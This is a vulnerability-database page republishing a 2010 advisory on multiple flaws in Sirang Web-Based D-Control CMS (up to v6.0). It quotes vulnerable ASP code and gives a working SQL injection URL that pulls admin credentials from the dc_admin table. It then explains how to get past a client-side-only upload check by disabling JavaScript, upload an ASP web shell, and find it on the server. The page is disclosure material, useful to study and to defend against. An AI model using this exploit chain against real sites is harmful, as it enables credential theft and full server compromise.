Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sirang Web-Based D-Control Multiple Remote Vulnerabilities

🗓️ 08 Sep 2010 00:00:00Reported by AbysssecType 
zdt
 zdt🔗 0day.today👁 13 Views

Sirang Web-Based D-Control <=v6.0 Remote Vulnerabilities, SQL Injection, Bypass Uploads Restrictio

Code
==========================================================
Sirang Web-Based D-Control Multiple Remote Vulnerabilities 
==========================================================

- Title  : Sirang Web-Based D-Control Multiple Remote Vulnerabilities
- Affected Version : <= v6.0
- Vendor  Site   : http://www.sirang.com
 
- Discovery : Abysssec.com
 
 
 
Description :
 
this CMS suffer from OWASP top 10 !!!
some of there will come here ...
 
Vulnerabilites :
======================================================================================================================
1- SQL Injection
 
Vulnerability is located in content.asp
 
line 131-133
...
    txt="select * from news where del='false' and "+keyfld+"!='-' order by id desc limit 1"
    set rs=conn.execute(txt)
    while not rs.eof
...
 
content.asp line 202-206
...
if id<>"" then
                    txt10 ="select * from "+ cstr(tblname) +" where del='false' and id='"+ id +"'"
                    set xx = conn.execute(txt10)
                    if not xx.eof then
...            
 
lots of files those will have to do input validation from user input are vulnerable to SQL Injection .
 
PoC :
www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
note : if you can't see result you need to do it blindly
 
 
======================================================================================================================
2- Bypass uploads restriction:
 
after you got user/pass with sql injection go to
http://site.com/admin/dc_upload.asp
 
js file line 13-34 :
 
 
function showthumb(file) {
    if (file !='') {
    myshowfile = file;
     
    extArray = new Array(".gif", ".jpg", ".png", ".bmp", ".jpe");
    allowSubmit = false;
    while (file.indexOf("\\") != -1)
    file = file.slice(file.indexOf("\\") + 1);
    ext = file.slice(file.indexOf(".")).toLowerCase();
    for (var i = 0; i < extArray.length; i++) {
    if (extArray[i] == ext) { allowSubmit = true; break; }
    }
     
    if (allowSubmit) thumb.src=myshowfile;
    else
    alert("Only files that end in types:  " + (extArray.join("  ")) + " could be previewd.");
    }
    else {
    alert("Only files that end in types:  " + (extArray.join("  ")) + " could be previewd.");
    }
}
  
as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload "ASP" shell.
 
you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)



#  0day.today [2018-04-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Sep 2010 00:00Current
7.1High risk
Vulners AI Score7.1
sirangweb-basedvulnerabilitiessql injectionbypass uploadsremoteowaspabyssseccmssecurityjavascriptexploit
13